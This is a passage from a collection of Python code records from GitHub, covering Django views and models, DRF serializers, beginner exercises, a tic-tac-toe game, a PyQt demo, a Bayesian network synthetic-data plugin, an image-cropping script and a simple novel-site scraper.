allowed_chars='ABCDEFGHIJKLMNOPQRSTUVWXYZ123456789') + '@kravetz.eau'\n            teacher_tmp.phone = '+' + get_random_string(length=13, allowed_chars='0123456789')\n            teacher_tmp.save()\n\n    if not pk:\n        template_ = 'teachers.html'\n        teachers = Teacher.objects.all()\n        context = {\n            'teachers': teachers\n        }\n    else:\n        current_teacher = get_object_or_404(Teacher, pk=pk)\n        teachers = Teacher.objects.all()\n        template_ = 'teacher_detail.html'\n        context = {\n            'teachers': teachers,\n            'current_teacher': current_teacher\n        }\n\n    return render(request=request, template_name=template_, context=context)\n","repo_name":"pushinm/django_hw_9","sub_path":"another_classboard/teachers/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1706,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"5197544767","text":"'''\nThe while loop in Python - Lesson 7\nUsed to perform actions while a condition\nremains true.\n\n'''\n\nx = 0\nwhile x < 
11:\n    print(x)\n    x = x + 1\n\nprint('Acabou')\n\n# Example of the continue statement: it stops the rest of the loop body from running for that iteration.\n\nx = 0\nwhile x < 10:\n    if x == 3:\n        x = x + 1  # We have to repeat the statement from below here, because after the continue\n        continue  # it no longer runs, and the number 3 is skipped in the output.\n\n    print(x)\n    x = x + 1\n\nprint('Acabou')\n\n# Similar to continue we have break: it ends the loop and jumps to the end.\n\nx = 0\nwhile x < 10:\n    if x == 3:\n        x = x + 1\n        break\n\n    print(x)\n    x = x + 1\n\nprint('Acabou')\n\nprint()\n\nx = 0  # column\n\nwhile x < 10:\n    y = 0  # row\n    while y < 5:\n        print(f'X vale {x} e Y vale {y}')\n        y += 1  # y = y + 1\n\n    x += 1  # x = x + 1\n\nprint('Acabou!!')\n\nprint()\n\nwhile True:\n    print()\n    num1 = input('Digite um numero: ')\n    operador = input('Digite o operador: ')\n    num2 = input('Digite outro numero: ')\n    sair = input('Deseja sair? [s]im ou [n]ão? ')\n\n    if not num1.isnumeric() or not num2.isnumeric():\n        print('Voce precisa digitar um numero.')\n        continue\n\n    num1 = int(num1)\n    num2 = int(num2)\n\n    if operador == '+':\n        print(num1 + num2)\n    elif operador == '-':\n        print(num1 - num2)\n    elif operador == '*':\n        print(num1 * num2)\n    elif operador == '/':\n        print(num1 / num2)\n    else:\n        print('Impossivel de calcular.')\n\n    if sair == 's':\n        break\n","repo_name":"kamui-7/Curso-Python","sub_path":"Modulo 1 - Basico/Aula 7.py","file_name":"Aula 7.py","file_ext":"py","file_size_in_byte":1584,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"72573488570","text":"#!/usr/bin/env python\n\nimport logging, var\nfrom logging import handlers\n\ndebug, info, warning, error, critical = None, None, None, None, None\n\ndef _getlevel(var):\n    if var.Configuration['loglevel'] == 'info':\n        return logging.INFO\n    elif var.Configuration['loglevel'] == 'warning':\n        return logging.WARNING\n    elif var.Configuration['loglevel'] == 'debug':\n        return logging.DEBUG\n    elif var.Configuration['loglevel'] == 'error':\n        return logging.ERROR\n    elif var.Configuration['loglevel'] == 'critical':\n        return logging.CRITICAL\n    return logging.INFO\ndef init():\n    global debug, info, warning, error, critical\n    var.log = logging.getLogger('labere')\n    if var.Configuration['fork'] == 'False':\n        stream = logging.StreamHandler()\n    else:\n        stream = None\n    handler = handlers.RotatingFileHandler(filename=var.Configuration['logfile'], maxBytes=10000, backupCount=5)\n    formatter = logging.Formatter('[%(asctime)s] -- %(levelname)s -- %(message)s')\n    handler.setFormatter(formatter)\n    if stream:\n        stream_formatter = logging.Formatter('%(levelname)s: %(message)s')\n        stream.setFormatter(stream_formatter)\n        var.log.addHandler(stream)\n    var.log.addHandler(handler)\n    var.log.setLevel(_getlevel(var))\n    debug, info, warning = var.log.debug, var.log.info, var.log.warning\n    error, critical = var.log.error, var.log.critical","repo_name":"alyx/labere","sub_path":"core/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":1416,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"10390382587","text":"# -*- coding: utf-8 -*-\n\"\"\"\nDescription: This script reads the files test.JSON and train.JSON, picks the image paths\nand co-ordinates, crops the cell images and saves them to the category folders\naccordingly.\n\n@author: jaydeep\n\"\"\"\nimport os\nimport pandas as pd\nimport cv2\nfrom pathlib import Path\n\n# Dataset path\ndataset_path = 
Path(r'E:\\Class_Notes_Sem2\\ADM\\Project\\malaria-bounding-boxes\\malaria')\n\ndef main():\n # Dataframe to store to serialise JSON\n dataset_df = {}\n # Read the JSON contents to the dataframe\n for p,f,files in os.walk(dataset_path):\n for file in files:\n if file.endswith('json'):\n dataset_df[file.strip('.json')] = pd.read_json(os.path.join(p, file))\n \n # Extract the path, objects and categories if the images\n object_df = {}\n for types in dataset_df.keys():\n # Retrieve the pathnames\n dataset_df[types]['path'] = dataset_df[types]['image'].map(lambda x: dataset_path / x['pathname'][1:])\n # Check for image existence\n dataset_df[types]['image_exists'] = dataset_df[types]['path'].map(lambda x: x.exists())\n # For each image store paths and objects\n object_df[types] = pd.DataFrame([dict(image=c_row['path'], **c_item) \\\n for _, c_row in dataset_df[types].iterrows() for c_item in c_row['objects']])\n \n # Create a folder for each category\n try:\n for types in object_df.keys():\n for category in (object_df[types]['category']).unique():\n os.mkdir(dataset_path / category)\n except:\n print(\"Folder already exists\")\n \n # Crop out the images using the co-ordinates\n for types in object_df.keys():\n count = 1\n # Iter through each row of the dataframe\n for index, row in object_df[types].iterrows():\n # Get the path\n path = row['image']\n # Read the image\n im = cv2.imread(str(path))\n # Get the category to store the cropped image later to folder\n category = row['category']\n # Get the lower left coordinates\n min_val = row['bounding_box']['minimum']\n # Get the upper right coordinates\n max_val = row['bounding_box']['maximum']\n # Crop Image\n crop_img = im[min_val['r']:max_val['r'], min_val['c']:max_val['c']]\n # Write to the folder\n cv2.imwrite(r\"E:\\Class_Notes_Sem2\\ADM\\Project\\malaria-bounding-boxes\\malaria\\{}\\{}.jpg\".format(category, count), crop_img)\n cv2.waitKey(2)\n count+=1\n print(\"Cropping done, {} images cropped\".format(count))\n return\n\nif __name__== '__main__':\n main()","repo_name":"jaydeepdeka/malaria_level_detection","sub_path":"crop_utils.py","file_name":"crop_utils.py","file_ext":"py","file_size_in_byte":2684,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"36211668309","text":"import random\n\ndef main():\n\t\"\"\"Begins a game of tic-tac-toe.\"\"\"\n\tGame = TicTacToe()\n\tprint(\"Welcome to Tic-Tac-Toe\")\n\twhile True:\n\t\tprint(\"Player%d, take your move.\" % Game.turn)\n\t\trow = int(input(\"Enter row of move... \"))\n\t\tcol = int(input(\"Enter col of move... \"))\n\t\tGame.move(Game.turn, row, col)\n\t\tGame.printBoard()\n\t\tif Game.win:\n\t\t\trestart = int(input(\"Enter 1 to restart the game, 0 to end game... \"))\n\t\t\tif restart == 1:\n\t\t\t\tGame.restartGame()\n\t\t\telse:\n\t\t\t\tprint(\"Closing Tic-Tac-Toe Game...\")\n\t\t\t\treturn\n\nclass TicTacToe():\n\t\"\"\"A tic-tac-toe game. \n\n\tTwo players take turns specifying the row and column to make\n\ttheir next move. When a player wins, they can either exit or restart.\n\n\tAttributes\n\t----------\n\tstate: 3x3 integer array\n\t\tCurrent state of the game where 0 is empty, 1 for X, and 2 for O.\n\tturn: integer\n\t\tRepresents whos turn it currently is. 1 for X and 2 for O.\n\twin: integer\n\t\t0 if there is no current winner. 
1 if X wins, 2 if O wins.\n\t\"\"\"\n\tdef __init__(self):\n\t\tself.state = [[0 for x in range(3)] for y in range(3)]\n\t\tself.turn = self.whoGoesFirst()\n\t\tself.win = 0\n\n\tdef changeTurn(self):\n\t\t\"\"\"Flips who turn it is in this game.\"\"\"\n\t\tif self.turn == 1:\n\t\t\tself.turn = 2\n\t\telse:\n\t\t\tself.turn = 1\n\n\tdef move(self, player, row, col):\n\t\t\"\"\"Moves the player at the given row and col in the board.\n\n\t\tIf that position has already been taken, will alert player and \n\t\tit will still be their turn.\n\t\t\"\"\"\n\t\tif player != self.turn: # not this player's turn\n\t\t\tprint(\"Oops! It is not your turn, Player%d\" % player)\n\t\t\treturn\n\t\tif self.state[row][col]: # already a move in this position\n\t\t\tprint(\"Oops! It seems that someone has already moved here, Player%d\" % player)\n\t\t\treturn\n\t\telse: # empty spot\n\t\t\tself.state[row][col] = player\n\t\t\tself.checkForWin(self.state, player)\n\t\t\tself.changeTurn()\n\n\tdef checkForWin(self, board, player):\n\t\t\"\"\"Checks all possibilities for player to win.\"\"\"\n\t\tif ((board[0][0] == player and board[0][1] == player and board[0][2] == player) or\n\t\t\t(board[1][0] == player and board[1][1] == player and board[1][2] == player) or\n\t\t\t(board[2][0] == player and board[2][1] == player and board[2][2] == player) or\n\t\t\t(board[0][0] == player and board[1][1] == player and board[2][2] == player) or\n\t\t\t(board[0][2] == player and board[1][1] == player and board[2][0] == player) or\n\t\t\t(board[0][0] == player and board[1][0] == player and board[2][0] == player) or\n\t\t\t(board[0][1] == player and board[1][1] == player and board[2][1] == player) or\n\t\t\t(board[0][2] == player and board[1][2] == player and board[2][2] == player)):\n\t\t\tprint(\"----------------------------\")\n\t\t\tprint(\"Yay! 
Player%d is the winner!\" % player)\n\t\t\tprint(\"----------------------------\")\n\t\t\tself.win = player\n\n\tdef whoGoesFirst(self):\n\t\t\"\"\"Assigns what player goes first in this game.\n\n\t\tRandomly chooses either 1 or 2, representing which player.\n\t\t\"\"\"\n\t\treturn random.randint(1, 2)\n\n\tdef restartGame(self):\n\t\t\"\"\"Restarts this game's values to a new game.\"\"\"\n\t\tself.state = [[0 for x in range(3)] for y in range(3)]\n\t\tself.turn = self.whoGoesFirst()\n\t\tself.win = 0\n\n\tdef printBoard(self):\n\t\t\"\"\"Prints the current state of the tic-tac-toe board.\"\"\"\n\t\tkey = [' ', 'X', 'O']\n\t\tprint(' | |')\n\t\tprint(' ' + key[self.state[0][0]] + ' | ' + key[self.state[0][1]] + ' | ' + key[self.state[0][2]])\n\t\tprint(' | |')\n\t\tprint('-----------')\n\t\tprint(' | |')\n\t\tprint(' ' + key[self.state[1][0]] + ' | ' + key[self.state[1][1]] + ' | ' + key[self.state[1][2]])\n\t\tprint(' | |')\n\t\tprint('-----------')\n\t\tprint(' | |')\n\t\tprint(' ' + key[self.state[2][0]] + ' | ' + key[self.state[2][1]] + ' | ' + key[self.state[2][2]])\n\t\tprint(' | |')\n\nif __name__ == \"__main__\":\n\tmain()\t\t","repo_name":"derrowap/MA490-MachineLearning-FinalProject","sub_path":"TicTacToe.py","file_name":"TicTacToe.py","file_ext":"py","file_size_in_byte":3683,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"72703274810","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# 开发团队 : Sunniwell\n# 开发人员 : chengc\n# 开发时间 : 2021/6/24 14:57\n# 文件名称 : ColumnSort.py\n# 开发工具 : PyCharm\n\n\"\"\"\n按照某一列数据排序\n\"\"\"\n\nimport sys\nfrom PyQt5.QtGui import *\nfrom PyQt5.QtCore import *\nfrom PyQt5.QtWidgets import *\n\n\nclass ColumnSortDemo(QWidget):\n def __init__(self):\n super(ColumnSortDemo, self).__init__()\n self.setWindowTitle('数据排序')\n self.resize(400, 200)\n\n self.sortType = Qt.AscendingOrder\n self.tableWidget = QTableWidget(4, 3)\n self.tableWidget.setHorizontalHeaderLabels(['姓名', '性别', '体重(KG)'])\n\n listData = [['刘亦菲', '女', '45'],\n ['刘诗诗', '女', '44'],\n ['迪丽热巴', '女', '50'],\n ['古力娜扎', '女', '48']]\n\n for i in range(len(listData)):\n for j in range(len(listData[i])):\n self.tableWidget.setItem(i, j, QTableWidgetItem(listData[i][j]))\n\n sortButton = QPushButton('按体重排序')\n sortButton.clicked.connect(self.sortTable)\n\n layout = QVBoxLayout()\n layout.addWidget(self.tableWidget)\n layout.addWidget(sortButton)\n self.setLayout(layout)\n\n def sortTable(self):\n if self.sortType == Qt.AscendingOrder:\n self.sortType = Qt.DescendingOrder\n else:\n self.sortType = Qt.AscendingOrder\n\n self.tableWidget.sortItems(2, self.sortType)\n\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n mainWin = ColumnSortDemo()\n mainWin.show()\n sys.exit(app.exec_())\n","repo_name":"QCZL/PyQt5","sub_path":"TableAndTree/ColumnSort.py","file_name":"ColumnSort.py","file_ext":"py","file_size_in_byte":1672,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"29414568359","text":"import math\ndef area_triangulo(base,altura):\n area=(base*altura)/2\n return area\n\ndef area_rectangulo(base,altura):\n area=base*altura\n return area\n\ndef area_rombo(diagonal1,diagonal2):\n area=(diagonal1*diagonal2)/2\n return area\n\ndef area_circulo(radio):\n area=math.pi*radio**2\n return area\n\ndef menu_figuras():\n a=input(\"Ingrese el área que desea calcular (triangulo,rectangulo,rombo o circulo: \")\n a=a.lower()\n if a==\"triangulo\":\n b=int(input(\"Ingrese base: \"))\n 
h=int(input(\"Ingrese altura: \"))\n return area_triangulo(b,h)\n elif a==\"rectangulo\":\n b=int(input(\"Ingrese base: \"))\n h=int(input(\"Ingrese altura: \"))\n return area_rectangulo(b,h)\n elif a==\"rombo\":\n b=int(input(\"Ingrese una diagonal: \"))\n h=int(input(\"Ingrese la otra diagonal: \"))\n return area_rombo(b,h)\n elif a==\"circulo\":\n r=int(input(\"Ingrese radio: \"))\n return area_circulo(r)\n\nif __name__ == \"__main__\":\n pass\n ","repo_name":"pabloschwarzenberg/grader","sub_path":"tema2_ej1/tema2_ej1_9b7f534138276dc3088f06c18305e3a4.py","file_name":"tema2_ej1_9b7f534138276dc3088f06c18305e3a4.py","file_ext":"py","file_size_in_byte":1013,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"19551817811","text":"\"\"\"Bayesian Network for generative modeling. Implemented using pgmpy backend.\n\nReference: JAnkan, Ankur and Panda, Abinash,\n\"pgmpy: Probabilistic graphical models using python,\"\nProceedings of the 14th Python in Science Conference (SCIPY 2015), 2015.\n\"\"\"\n\n# stdlib\nfrom typing import Any, List\n\n# third party\nimport numpy as np\nimport pandas as pd\nimport pgmpy.estimators as estimators\nfrom pgmpy.models import BayesianNetwork\nfrom pgmpy.sampling import BayesianModelSampling\n\n# synthcity absolute\nfrom synthcity.plugins.core.dataloader import DataLoader\nfrom synthcity.plugins.core.distribution import CategoricalDistribution, Distribution\nfrom synthcity.plugins.core.models.tabular_encoder import TabularEncoder\nfrom synthcity.plugins.core.plugin import Plugin\nfrom synthcity.plugins.core.schema import Schema\n\n\nclass BayesianNetworkPlugin(Plugin):\n \"\"\"BayesianNetwork plugin.\n\n Example:\n >>> from synthcity.plugins import Plugins\n >>> plugin = Plugins().get(\"bayesian_network\")\n >>> from sklearn.datasets import load_iris\n >>> X = load_iris()\n >>> plugin.fit(X)\n >>> plugin.generate()\n \"\"\"\n\n def __init__(\n self,\n struct_learning_n_iter: int = 1000,\n struct_learning_search_method: str = \"tree_search\", # hillclimb, pc, tree_search, mmhc, exhaustive\n struct_learning_score: str = \"k2\", # k2, bdeu, bic, bds\n struct_max_indegree: int = 4,\n encoder_max_clusters: int = 10,\n encoder_noise_scale: float = 0.1,\n **kwargs: Any,\n ) -> None:\n super().__init__(**kwargs)\n\n self.struct_learning_n_iter = struct_learning_n_iter\n self.struct_learning_search_method = struct_learning_search_method\n self.struct_learning_score = struct_learning_score\n self.struct_max_indegree = struct_max_indegree\n\n self.encoder = TabularEncoder(max_clusters=encoder_max_clusters)\n self.encoder_noise_scale = encoder_noise_scale\n\n @staticmethod\n def name() -> str:\n return \"bayesian_network\"\n\n @staticmethod\n def type() -> str:\n return \"generic\"\n\n @staticmethod\n def hyperparameter_space(**kwargs: Any) -> List[Distribution]:\n return [\n CategoricalDistribution(\n name=\"struct_learning_search_method\",\n choices=[\"hillclimb\", \"pc\", \"tree_search\"],\n ),\n CategoricalDistribution(\n name=\"struct_learning_score\", choices=[\"k2\", \"bdeu\", \"bic\", \"bds\"]\n ),\n ]\n\n def _encode_decode(self, data: pd.DataFrame) -> pd.DataFrame:\n encoded = self.encoder.transform(data)\n\n # add noise to the mixture means, but keep the continuous cluster\n noise = np.random.normal(\n loc=0, scale=self.encoder_noise_scale, size=len(encoded)\n )\n for col in encoded.columns:\n if col.endswith(\".normalized\"):\n encoded[col] += noise\n\n decoded = self.encoder.inverse_transform(encoded)\n 
decoded = decoded[data.columns]\n\n return decoded\n\n def _get_structure_scorer(self) -> Any:\n return {\n \"k2\": estimators.K2Score,\n \"bdeu\": estimators.BDeuScore,\n \"bic\": estimators.BicScore,\n \"bds\": estimators.BDsScore,\n }[self.struct_learning_score]\n\n def _get_dag(self, X: pd.DataFrame) -> Any:\n scoring_method = scoring_method = self._get_structure_scorer()(data=X)\n if self.struct_learning_search_method == \"hillclimb\":\n return estimators.HillClimbSearch(data=X).estimate(\n scoring_method=scoring_method,\n max_indegree=self.struct_max_indegree,\n max_iter=self.struct_learning_n_iter,\n show_progress=False,\n )\n elif self.struct_learning_search_method == \"pc\":\n return estimators.PC(data=X).estimate(\n scoring_method=scoring_method, show_progress=False\n )\n elif self.struct_learning_search_method == \"tree_search\":\n return estimators.TreeSearch(data=X).estimate(show_progress=False)\n elif self.struct_learning_search_method == \"mmhc\":\n return estimators.MmhcEstimator(data=X).estimate(\n scoring_method=scoring_method,\n )\n elif self.struct_learning_search_method == \"exhaustive\":\n return estimators.ExhaustiveSearch(data=X).estimate()\n else:\n raise ValueError(f\"invalid estimator {self.struct_learning_search_method}\")\n\n def _fit(self, X: DataLoader, *args: Any, **kwargs: Any) -> \"BayesianNetworkPlugin\":\n df = X.dataframe()\n self.encoder.fit(df)\n\n dag = self._get_dag(df)\n\n network = BayesianNetwork(dag)\n network.fit(df)\n\n self.model = BayesianModelSampling(network)\n return self\n\n def _generate(self, count: int, syn_schema: Schema, **kwargs: Any) -> pd.DataFrame:\n def _sample(count: int) -> pd.DataFrame:\n vals = self.model.forward_sample(size=count, show_progress=False)\n\n return self._encode_decode(vals)\n\n return self._safe_generate(_sample, count, syn_schema)\n\n\nplugin = BayesianNetworkPlugin\n","repo_name":"bvanbreugel/deep_generative_ensemble","sub_path":"src/synthcity/plugins/generic/plugin_bayesian_network.py","file_name":"plugin_bayesian_network.py","file_ext":"py","file_size_in_byte":5212,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"77"} +{"seq_id":"34695923363","text":"from django.db import models\nfrom institution.models import Department\nfrom django.utils.translation import gettext as _\nfrom evaluator.models import Evaluator\nfrom django.db import models\nfrom applicant.models import Applicant,Reference\nfrom .utils import application_upload\nfrom django.core.validators import FileExtensionValidator\n\nclass MscProgramme(models.Model):\n title = models.CharField(_('Title'),max_length = 200)\n address = models.CharField(_('Address'),max_length=50)\n description=models.TextField(_('description'),null=True,blank=True)\n department=models.ForeignKey(Department,on_delete=models.CASCADE, verbose_name=_(\"Department\"))\n\n def __str__(self):\n return self.title\n\n class Meta:\n verbose_name = _(\"MSC Programme\")\n verbose_name_plural = _(\"MSC Programmes\")\n\nclass MscFlow(models.Model):\n title = models.CharField(_('Title'),max_length = 200)\n msc_programme=models.ForeignKey(MscProgramme,on_delete=models.CASCADE,verbose_name=_(\"Msc Programme\"))\n\n def __str__(self):\n return self.title\n\n class Meta:\n verbose_name = _(\"MSC Flow\")\n verbose_name_plural = _(\"MSC Flows\")\n\n\nclass Call(models.Model):\n title = models.CharField(_('Title'),max_length = 200)\n start_date=models.DateField(_('Start date'))\n end_date=models.DateField(_('End Date'))\n 
msc_programme=models.ForeignKey(MscProgramme,on_delete=models.CASCADE, verbose_name=_(\"Msc Programme\"))\n evaluators = models.ManyToManyField(\n Evaluator, blank=False)\n\n def __str__(self):\n return self.title\n\n class Meta:\n verbose_name = _(\"Call\")\n verbose_name_plural = _(\"Calls\")\n\nclass Application (models.Model):\n applicant=models.ForeignKey(Applicant,on_delete=models.CASCADE)\n call=models.ForeignKey(Call,on_delete=models.CASCADE)\n submission_date=models.DateField(_('Submission Date'),auto_now_add=True)\n comments=models.TextField(_('Comments'),null=True,blank=True)\n admitted=models.BooleanField(_('Admitted'),default=None,null=True,blank=True)\n reference=models.ForeignKey(Reference,on_delete=models.SET_NULL,null=True,blank=True)\n media_file = models.FileField(_('Media File'),upload_to=application_upload,validators=[FileExtensionValidator(allowed_extensions=['pdf'])])\n preferences = models.ManyToManyField(MscFlow,through='Preference',blank=True,related_name=\"waiting_applications\")\n admitted_flow=models.ForeignKey(MscFlow,on_delete=models.CASCADE,blank=True,null=True,related_name=\"admitted_application\")\n\n def __str__(self):\n return self.applicant.user.email+\" application\"\n\n class Meta:\n verbose_name = _(\"Application\")\n verbose_name_plural = _(\"Applications\")\n constraints = [\n models.UniqueConstraint(fields=['applicant', 'call'], name='unique call for applicant')\n ]\nclass Preference(models.Model):\n application = models.ForeignKey(Application, on_delete=models.CASCADE)\n flow = models.ForeignKey(MscFlow,on_delete=models.CASCADE)\n priority = models.PositiveIntegerField(_('Priority'),)\n\n class Meta:\n ordering = [\"priority\"]\n verbose_name = _(\"Priority\")\n verbose_name_plural = _(\"Priorities\")\n\n def __str__(self):\n return self.flow.title","repo_name":"Nisfeight8/mscApplications","sub_path":"mscApplications/msc/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3255,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"13374907934","text":"# 爬取的网站为斗破苍穹小说网\n# 本次demo主要是学习re模块的使用\n# 其中用的最多的是(.*?)语法,可以匹配括号里的任何内容\n# demo如下\n\n\nimport requests\nimport re\nimport time\n\nheaders = {\n 'User-agent':'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36'\n }\n\n# def openFile():\n# try:\n# f = open(' /Users/xulei2/Desktop/doupo.txt','a+')\n# except\n\nf = open('/Users/xulei2/Desktop/doupo.txt','a+')\n\ndef get_info(url):\n res = requests.get(url,headers=headers)\n if res.status_code == 200:\n contents = re.findall('

(.*?)
',res.content.decode('utf-8'))\n for content in contents:\n f.write(content+'\\n')\n else:\n pass\n\nif __name__ == '__main__':\n urls = ['http://www.doupoxs.com/doupocangqiong/{}.html'.format(num) for num in range(2,1665)]\n for url in urls:\n get_info(url)\n # time.sleep(1)\n f.close()","repo_name":"Metatronxl/Crawl_practice_collection","sub_path":"crawl_doupoxs_re/crawl_doupoxs_re.py","file_name":"crawl_doupoxs_re.py","file_ext":"py","file_size_in_byte":996,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"29994056223","text":"\"\"\"\n--------------------------------------------------------------------------------------------------\n File Name: hrms/ref_data_management/serializers.py\n Description: This module contains all API endpoints for the ref_data_management application.\n--------------------------------------------------------------------------------------------------\n\"\"\"\nfrom rest_framework import serializers\nfrom .models import (\n RefCountry,\n RefStateProvince,\n RefMaritalStatus,\n RefContactType,\n RefAddressType,\n RefGender,\n RefDepartment,\n RefDesignation,\n RefPerformanceRecStatus,\n RefRatingScale,\n RefTargetUnit,\n RefLeaveType,\n RefLeaveRequestStatus,\n RefLeaveRevisionType\n )\n\n\nclass AbstractBaseSerializer(serializers.ModelSerializer):\n class Meta:\n fields = \\\n [\n 'created_by',\n 'last_updated_by',\n 'deleted_status',\n 'created_date',\n 'deleted_date',\n 'created_date',\n 'last_updated_date'\n ]\n\n\nclass RefCountrySerializer(AbstractBaseSerializer):\n \"\"\"\n This module has the attributes of 'Country' model\n \"\"\"\n class Meta:\n model = RefCountry\n fields = \\\n [\n 'id',\n 'country_name',\n 'country_iso_code',\n 'country_code',\n ] + AbstractBaseSerializer.Meta.fields\n\n\nclass RefStateProvinceSerializer(AbstractBaseSerializer):\n \"\"\"\n This module has the attributes of 'state' model\n \"\"\"\n country_name = serializers.StringRelatedField(source='country', read_only=True)\n\n class Meta:\n model = RefStateProvince\n fields = \\\n [\n 'id',\n 'state_name',\n 'state_code',\n 'country',\n 'country_name'\n ] + AbstractBaseSerializer.Meta.fields\n\n\nclass RefMaritalStatusSerializer(AbstractBaseSerializer):\n \"\"\"\n This module contains the serializer for the Marital Status Model.\n \"\"\"\n\n class Meta:\n model = RefMaritalStatus\n fields = \\\n [\n 'id',\n 'marital_status',\n 'description'\n ] + AbstractBaseSerializer.Meta.fields\n\n\nclass RefContactTypeSerializer(AbstractBaseSerializer):\n \"\"\"\n This model contains the serializer for Employee Contact type model\n \"\"\"\n class Meta:\n model = RefContactType\n fields = \\\n [\n 'id',\n 'contact_type',\n 'description'\n ] + AbstractBaseSerializer.Meta.fields\n\n\nclass RefAddressTypeSerializer(AbstractBaseSerializer):\n \"\"\"\n This model contains the serializer for Employee Address type model\n \"\"\"\n class Meta:\n model = RefAddressType\n fields =\\\n [\n 'id',\n 'address_type',\n 'description'\n ] + AbstractBaseSerializer.Meta.fields\n\n\nclass RefGenderSerializer(AbstractBaseSerializer):\n \"\"\"\n This model contains the serializer for Gender model\n \"\"\"\n class Meta:\n model = RefGender\n fields = \\\n [\n 'id',\n 'gender_type',\n 'description'\n ] + AbstractBaseSerializer.Meta.fields\n\n\nclass RefDepartmentSerializer(AbstractBaseSerializer):\n \"\"\"\n This model contains the serializer for Department model\n \"\"\"\n class Meta:\n model = RefDepartment\n fields = \\\n [\n 'id',\n 'department_name',\n 
'department_code',\n 'description'\n ] + AbstractBaseSerializer.Meta.fields\n\n\nclass RefDesignationSerializer(AbstractBaseSerializer):\n \"\"\"\n This model contains the serializer for Designation model\n \"\"\"\n class Meta:\n model = RefDesignation\n fields = \\\n [\n 'id',\n 'designation_name',\n 'description'\n ] + AbstractBaseSerializer.Meta.fields\n\n\nclass RefTargetUnitSerializer(AbstractBaseSerializer):\n \"\"\"\n This model contains the serializer for Target Unit model.\n \"\"\"\n class Meta:\n model = RefTargetUnit\n fields = [\n 'id',\n 'target_unit',\n ] + AbstractBaseSerializer.Meta.fields\n\n\nclass RefPerformanceRecStatusSerializer(AbstractBaseSerializer):\n \"\"\"\n This model contains the serializer for Performance Record Status model.\n \"\"\"\n class Meta:\n model = RefPerformanceRecStatus\n fields = [\n 'id',\n 'status_name',\n 'description'\n ] + AbstractBaseSerializer.Meta.fields\n\n\nclass RefRatingScaleSerializer(AbstractBaseSerializer):\n \"\"\"\n This model contains the serializer for Rating Scale model.\n \"\"\"\n\n class Meta:\n model = RefRatingScale\n fields = [\n 'id',\n 'rating_value',\n 'description'\n ] + AbstractBaseSerializer.Meta.fields\n\n\nclass RefLeaveTypeSerializer(AbstractBaseSerializer):\n \"\"\"\n This model contains the serializer for LEAVE TYPE model\n \"\"\"\n class Meta:\n model = RefLeaveType\n fields = \\\n [\n 'id',\n 'leave_type_name',\n 'description'\n ] + AbstractBaseSerializer.Meta.fields\n\n\nclass RefLeaveRequestStatusSerializer(AbstractBaseSerializer):\n \"\"\"\n This model contains the serializer for lEAVE REQUEST STATUS model\n \"\"\"\n\n class Meta:\n model = RefLeaveRequestStatus\n fields = \\\n [\n 'id',\n 'leave_request_status_name',\n 'description'\n ] + AbstractBaseSerializer.Meta.fields\n\n\nclass RefLeaveRevisionTypeSerializer(AbstractBaseSerializer):\n \"\"\"\n This model contains the serializer for lEAVE REVISION TYPE model\n \"\"\"\n\n class Meta:\n model = RefLeaveRevisionType\n fields = \\\n [\n 'id',\n 'leave_revision_type_name',\n 'description'\n ] + AbstractBaseSerializer.Meta.fields\n\n","repo_name":"aravindskn/HRMS","sub_path":"ref_data_management/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":6618,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"77"} +{"seq_id":"25461782825","text":"# Definition for a binary tree node.\nclass TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\n\nclass Solution:\n \n def sum_root_to_leaf(self, root):\n paths = self.get_root_to_leaf_paths(root)\n nums = list(map(lambda x: self.path_to_number(x), paths))\n return sum(nums)\n \n # eg: [1, 0, 0] => 4\n def path_to_number(self, nums):\n nums = list(map(str, nums))\n s = ''.join(nums)\n return int(s, 2)\n \n def get_root_to_leaf_paths(self, root):\n p = root\n last_visited = None\n res = []\n stack = []\n \n while p or stack:\n if p:\n stack.append(p)\n p = p.left\n else:\n cur = stack[-1]\n if cur.right and cur.right != last_visited:\n p = cur.right\n else:\n if not cur.left and not cur.right: \n nums = list(map(lambda x: x.val, stack))\n res.append(nums)\n last_visited = stack.pop(-1)\n return res\n","repo_name":"yibwu/leetcode","sub_path":"src/sum_of_root_to_leaf_binary_numbers_1022.py","file_name":"sum_of_root_to_leaf_binary_numbers_1022.py","file_ext":"py","file_size_in_byte":1153,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} 
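The sum-of-root-to-leaf record above builds every path explicitly with an iterative postorder walk and then converts each bit list to an integer through a string join and int(s, 2). As a point of comparison, here is a minimal recursive sketch of the same idea in Python, assuming the same TreeNode shape the record uses; the names sum_root_to_leaf and acc are illustrative, and the bit accumulation (acc << 1) | val stands in for the string conversion rather than reproducing the record's exact method.

class TreeNode:
    def __init__(self, x):
        self.val = x
        self.left = None
        self.right = None

def sum_root_to_leaf(root, acc=0):
    # Carry the number built so far down the recursion instead of
    # storing whole root-to-leaf paths.
    if root is None:
        return 0
    acc = (acc << 1) | root.val  # append this node's 0/1 bit
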